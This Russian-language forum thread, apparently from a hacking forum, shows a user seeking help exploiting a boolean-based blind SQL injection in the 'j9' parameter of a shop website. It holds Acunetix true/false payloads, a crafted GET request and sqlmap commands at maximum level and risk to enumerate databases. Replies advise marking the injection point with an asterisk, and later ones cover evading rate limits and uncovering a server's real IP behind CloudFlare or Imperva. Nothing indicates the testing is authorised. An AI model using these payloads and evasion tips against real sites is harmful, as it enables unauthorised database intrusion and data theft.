Помощь в sqli

[RabbitsTeam]

Суть проблемы:
Ребят, всем привет. Столкнулся с проблемой в использовании sqlmap.
Sqlmap не видит injection. Хотя сам пробовал руками через Burp Suite, она там есть.
Как по результату сканирования Acunetix, я пришел к выводу что это Boolean-based blind.

Проберка Burp Suite:
Через Burp Suite пробовал тестить данную уязвимость, была следующая картина:
В тех payload, где Acunetix выдавал TRUE ---> показывался контент на странице, FALSE ---> контента соответственно не было.

Выходные данные Acunetix:

URL:

https://name-shop.com/name.php

Acunetix показал следующее:

URL encoded GET input j9 was set to Name Product' AND 3*3*9<(2*4) AND '0001yMq'='0001yMq

Tests performed:

• Name Product' AND 2*3*8=6*8 AND '0001yMq'='0001yMq => TRUE
• Name Product' AND 2*3*8=6*9 AND '0001yMq'='0001yMq => FALSE
• Name Product' AND 3*3<(2*4) AND '0001yMq'='0001yMq => FALSE
• Name Product' AND 3*2>(1*5) AND '0001yMq'='0001yMq => TRUE
• Name Product' AND 3*2*0>=0 AND '0001yMq'='0001yMq => TRUE
• Name Product' AND 3*3*9<(2*4) AND '0001yMq'='0001yMq => FALSE

Request:

GET /name.php?j9=Name%20Product'%20AND%203*3*9<(2*4)%20AND%20'0001yMq'='0001yMq&j10=Name%20Product%20Thread/%20Name&ggg=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: name-shop.com
Connection: Keep-alive

Использование Sqlmap:

sudo sqlmap --random-agent -u "https://name-shop.com/name.php?j9=Name%20Product&j10=Name%20Product%20Thread/%20Name&ggg=1" --no-cast --no-escape --level=5 --risk=3 -delay 5 --dbms=mysql --dbs

Буду рад помощи. Спасибо.

 

[c0d3x]

sudo sqlmap --random-agent -u "https://name-shop.com/name.php?j9=Name%20Product&j10=Name%20Product%20Thread/%20Name&ggg=1" --no-cast --no-escape --level=5 --risk=3 -delay 5 --dbms=mysql --dbs

А где тут входная точка? Не указано какой параметр мап должен инжектить. Астериском попробуй отметить.

sudo sqlmap --random-agent -u "https://name-shop.com/name.php?j9=Name%20Product*&j10=Name%20Product%20Thread/%20Name&ggg=1" --no-cast --no-escape --level=5 --risk=3 -delay 5 --dbms=mysql --dbs

И ключ delay я советую убрать, если там нет рейт-лимита.

 

[bacokd]

Also with -v5 you can see what payloads the sqlmap is using, how are they sent, what are responses. Once I found out that sqlmap is following redirects and injection diferently then I wanted and verbose debug helped.

 

[RabbitsTeam]

Also with -v5 you can see what payloads the sqlmap is using, how are they sent, what are responses. Once I found out that sqlmap is following redirects and injection diferently then I wanted and verbose debug helped.

Спасибо. Посмотрю.

 

[RabbitsTeam]

А где тут входная точка? Не указано какой параметр мап должен инжектить. Астериском попробуй отметить.

sudo sqlmap --random-agent -u "https://name-shop.com/name.php?j9=Name%20Product*&j10=Name%20Product%20Thread/%20Name&ggg=1" --no-cast --no-escape --level=5 --risk=3 -delay 5 --dbms=mysql --dbs

И ключ delay я советую убрать, если там нет рейт-лимита.

Спасибо, за помощь.

Входная точка параметр j9

А где тут входная точка? Не указано какой параметр мап должен инжектить. Астериском попробуй отметить.

sudo sqlmap --random-agent -u "https://name-shop.com/name.php?j9=Name%20Product*&j10=Name%20Product%20Thread/%20Name&ggg=1" --no-cast --no-escape --level=5 --risk=3 -delay 5 --dbms=mysql --dbs

И ключ delay я советую убрать, если там нет рейт-лимита.

 

[RabbitsTeam]

В дальнейшем не создавай отдеьную тему, для подобных вопросов пиши сюда:

http://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/14482/

Ты просто inj-point не указал, это не какая то нестандартная ситуация, требующая разбора на целый отдельный тред. Так не привлечешь больше внимания к своему вопросу, а только вызовешь раздражение.
Мы в той теме стараемся оперативно отвечать, даже если вопросы однотипные (такие же вопросы, как твой, составляют -> 90% всей темы). Всех благ )))

Понял. Спасибо.

 

[zeonx]

А где тут входная точка? Не указано какой параметр мап должен инжектить. Астериском попробуй отметить.

sudo sqlmap --random-agent -u "https://name-shop.com/name.php?j9=Name%20Product*&j10=Name%20Product%20Thread/%20Name&ggg=1" --no-cast --no-escape --level=5 --risk=3 -delay 5 --dbms=mysql --dbs

И ключ delay я советую убрать, если там нет рейт-лимита.

Кстати, c0d3x как обычно обходишь rate limit, кроме того что описано на hacktricks, изменение заголовков итп. Спасибо

 

[c0d3x]

Кстати, c0d3x как обычно обходишь rate limit, кроме того что описано на hacktricks, изменение заголовков итп. Спасибо

Тут негде особо разгуляться.

• Методы на hacktricks
• В различных сканнерах использовать задержку между отправкой запросов
• Если рейт-лимит именно на CDN (CloudFlare, Imperva и прочие) - тогда поиск реального IP сервера всеми возможными методами, в том числе этим.

 

[Nick]

Суть проблемы:
Ребят, всем привет. Столкнулся с проблемой в использовании sqlmap.
Sqlmap не видит injection. Хотя сам пробовал руками через Burp Suite, она там есть.
Как по результату сканирования Acunetix, я пришел к выводу что это Boolean-based blind.

Можешь мне в личку написать?